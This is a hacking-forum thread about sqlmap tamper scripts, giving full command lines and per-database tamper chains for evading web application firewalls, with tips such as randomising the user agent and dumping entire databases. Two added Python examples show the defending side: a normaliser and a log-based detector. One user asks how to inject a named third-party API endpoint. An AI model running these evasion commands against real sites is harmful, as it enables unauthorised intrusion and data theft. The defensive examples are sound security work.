SQLMap Tamper Scripts (SQL Injection and WAF bypass)

Hey All,

You all probably know about SQLmap's ability to load tamper-script rules to evade filters and WAFs, but what I didn't know until a few months back was that you can use all of them in one line, like so:

sqlmap -u 'http://www.site.com:80/search.cmd?form_state=1' --level=5 --risk=3 -p 'item1' --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords

These are some targeted tamper sets by DBMS type, good to have handy when testing:

General Tamper testing:

tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes

MSSQL:

tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes

MySQL:

tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor

Let’s just ignore the fact that you are sending a million requests though :wink:

6 Likes
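
The lists above are the evasion side; the filter-side counterpart is normalization. The example below is added here (it is not code from the post or from sqlmap): a WAF-style normalizer that undoes the encodings the named tampers apply (percent and double percent-encoding, %uXXXX escapes, fullwidth apostrophes, inline comments, blank runs, mixed case) and only then runs a signature check, so the tamper layer stops mattering. The two signatures and the sample payloads are constructed for illustration and are not a complete ruleset.

```python
# Added example (not from the forum post): the filter-side counterpart to the
# tamper list above. A signature check only works if the request is first
# reduced to one canonical form; these steps undo the encodings the named
# tampers apply. The signature set is illustrative, not a complete ruleset.
import re
from urllib.parse import unquote_plus

# charunicodeencode emits %uXXXX sequences, which urllib does not decode
_UNICODE_ESC = re.compile(r"%u([0-9a-fA-F]{4})")
# space2comment / randomcomments insert /**/ and /*junk*/ between tokens
_COMMENT = re.compile(r"/\*.*?\*/", re.S)
# multiplespaces / space2randomblank / space2mssqlblank use runs of assorted blanks
_BLANKS = re.compile(r"[\s\x00\x0b\x0c\xa0]+")


def _decode_unicode_escapes(s: str) -> str:
    return _UNICODE_ESC.sub(lambda m: chr(int(m.group(1), 16)), s)


def _fold_fullwidth(s: str) -> str:
    # apostrophemask swaps ' for the fullwidth apostrophe U+FF07; the whole
    # fullwidth ASCII block U+FF01..U+FF5E is offset by 0xFEE0 from ASCII
    return "".join(chr(ord(c) - 0xFEE0) if 0xFF01 <= ord(c) <= 0xFF5E else c for c in s)


def normalize(payload: str, max_rounds: int = 3) -> str:
    """Return the canonical form a signature should be matched against."""
    s = payload
    # charencode / percentage / chardoubleencode: decode until stable, bounded
    # so a hostile input cannot keep the loop busy
    for _ in range(max_rounds):
        decoded = unquote_plus(_decode_unicode_escapes(s))  # '+' becomes space (space2plus)
        if decoded == s:
            break
        s = decoded
    s = _fold_fullwidth(s)
    s = _COMMENT.sub(" ", s)
    s = _BLANKS.sub(" ", s).strip()
    return s.lower()  # randomcase


# Illustrative signatures; equaltolike and between rewrite '=' so the
# tautology rule accepts those operators as well.
_SIGNATURES = {
    "union-select": re.compile(r"\bunion(\s+all)?\s+select\b"),
    "tautology": re.compile(r"\bor\b\s*\S+\s*(=|like|between)\s*\S+"),
}


def matches(payload: str) -> list:
    """Names of the signatures that fire on the normalized payload."""
    norm = normalize(payload)
    return sorted(name for name, rx in _SIGNATURES.items() if rx.search(norm))


if __name__ == "__main__":
    # Constructed samples in the shapes the listed tampers produce
    for p in (
        "1%27%20UnIoN/**/aLl/**/SeLeCt%201,2,3--",   # charencode + randomcase + space2comment
        "%2527%2520OR%25201%253D1",                   # chardoubleencode
        "1%u0027%u0020OR%u00201%u003D1",              # charunicodeencode
        "1\uff07 or 1 like 1",                        # apostrophemask + equaltolike
        "cats or dogs",                               # benign
    ):
        print(repr(p), "->", repr(normalize(p)), matches(p))
```

The point of the bounded decode loop is that double encoding (chardoubleencode) only beats a filter that decodes once; decoding until the string stops changing, with a cap, closes that gap without giving an attacker a way to burn CPU.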

Also, just to give credit where credit is due, some of this was written up on a blog somewhere, but I can't find it for the life of me…

More references on SQLMap Tamper Scripts:

3 Likes

Sorry for my language, I'm an Italian boy. Good tutorial, but for example if the error is:

ADODB.Recordset error '800a0e78'

Operation is not allowed when the object is closed.

/ricerca.asp, line 337

I can use it, right?

tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes

Or do you recommend one specific tamper?

Tamper scripts post updated to reflect recent changes.

http://www.forkbombers.com/2016/07/sqlmap-tamper-scripts-update.html

J.

The domain has expired.

1 Like

They have updated sqlmap.

What I use for MySQL enumeration and DB hacking is:

--tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,percentage,randomcase,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor

If you have any issues, make sure you're setting these values:

--level 3
--risk 3
--flush-session
--random-agent ← this is almost critical from my exp.

Remember, always try to point sqlmap at a specific GET parameter with '-p <paramname>'.
For instance, if the URL is Example Domain:
sqlmap -p item

One additional thing that has helped me: add -a at the end, so it dumps anything it finds in the DB.

dj substance
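
The two flags the poster singles out have a mirror image in the web logs, which is why they matter. The example below is added here (it is not the poster's code or sqlmap's): sqlmap's default User-Agent begins with "sqlmap/", which is why --random-agent is "almost critical"; once the agent is randomized, what remains visible is the volume that the first post jokes about, many requests to one endpoint in a short window with a changing value for the same parameter. The log lines, addresses, thresholds and finding names are all constructed for the example.

```python
# Added example (not from the post above): what the two flags the poster
# calls out look like from the defending side. --random-agent matters because
# sqlmap's default User-Agent starts with "sqlmap/", which is trivially
# blocked; what remains after the agent is randomized is the volume: many
# requests to one endpoint in a short window, each with a different value
# for the same parameter. Log lines, addresses and thresholds are constructed.
import re
from collections import defaultdict
from datetime import datetime

# Apache/nginx combined log format
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

# Constructed sample: one source probing item1 on /search.cmd, first with the
# default agent and then with randomized agents, plus ordinary traffic.
SAMPLE_LOG = """\
203.0.113.9 - - [12/Jul/2016:10:00:01 +0000] "GET /search.cmd?form_state=1&item1=1 HTTP/1.1" 200 512 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
203.0.113.9 - - [12/Jul/2016:10:00:01 +0000] "GET /search.cmd?form_state=1&item1=1%27 HTTP/1.1" 500 318 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
203.0.113.9 - - [12/Jul/2016:10:00:02 +0000] "GET /search.cmd?form_state=1&item1=1%20AND%201%3D1 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0"
203.0.113.9 - - [12/Jul/2016:10:00:02 +0000] "GET /search.cmd?form_state=1&item1=1%20AND%201%3D2 HTTP/1.1" 200 204 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/537.36"
203.0.113.9 - - [12/Jul/2016:10:00:03 +0000] "GET /search.cmd?form_state=1&item1=1%27%20UNION%20SELECT%201,2,3-- HTTP/1.1" 500 318 "-" "Mozilla/5.0 (X11; Linux x86_64) Chrome/51.0"
198.51.100.7 - - [12/Jul/2016:10:00:05 +0000] "GET /search.cmd?form_state=1&item1=shoes HTTP/1.1" 200 4096 "-" "Mozilla/5.0 (Windows NT 10.0) Firefox/47.0"
198.51.100.7 - - [12/Jul/2016:10:02:40 +0000] "GET /product.cmd?id=77 HTTP/1.1" 200 8192 "-" "Mozilla/5.0 (Windows NT 10.0) Firefox/47.0"
"""


def parse(lines):
    """Yield one dict per line that matches the combined format; skip the rest."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
        yield rec


def _has_burst(timestamps, threshold, window_seconds):
    """True if any window of window_seconds holds at least threshold requests."""
    stamps = sorted(timestamps)
    start = 0
    for end, t in enumerate(stamps):
        while (t - stamps[start]).total_seconds() > window_seconds:
            start += 1
        if end - start + 1 >= threshold:
            return True
    return False


def detect(lines, burst_threshold=4, window_seconds=10):
    """Return sorted (ip, finding) pairs for the two signals described above."""
    findings = set()
    per_endpoint = defaultdict(list)  # (ip, path without query string) -> timestamps
    for rec in parse(lines):
        # Signal 1: the default agent, defeated by --random-agent
        if rec["ua"].lower().startswith("sqlmap/"):
            findings.add((rec["ip"], "sqlmap-user-agent"))
        # Signal 2: request volume against one endpoint, which --random-agent does not hide
        endpoint = rec["path"].split("?", 1)[0]
        per_endpoint[(rec["ip"], endpoint)].append(rec["ts"])
    for (ip, _endpoint), stamps in per_endpoint.items():
        if _has_burst(stamps, burst_threshold, window_seconds):
            findings.add((ip, "burst-same-endpoint"))
    return sorted(findings)


if __name__ == "__main__":
    for ip, finding in detect(SAMPLE_LOG.splitlines()):
        print(ip, finding)
```

The agent rule is the cheap one and is what the poster's flag is meant to beat; the per-endpoint burst rule is what keeps firing afterwards, and in the sample the same source trips both while the browsing client trips neither.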

I want to know if I can have SQL injection in this form:

curl 'https://api.infinitylearn.com/api/users/3024371' --compressed

Which is the best --tamper script in SQLMap to bypass Laravel?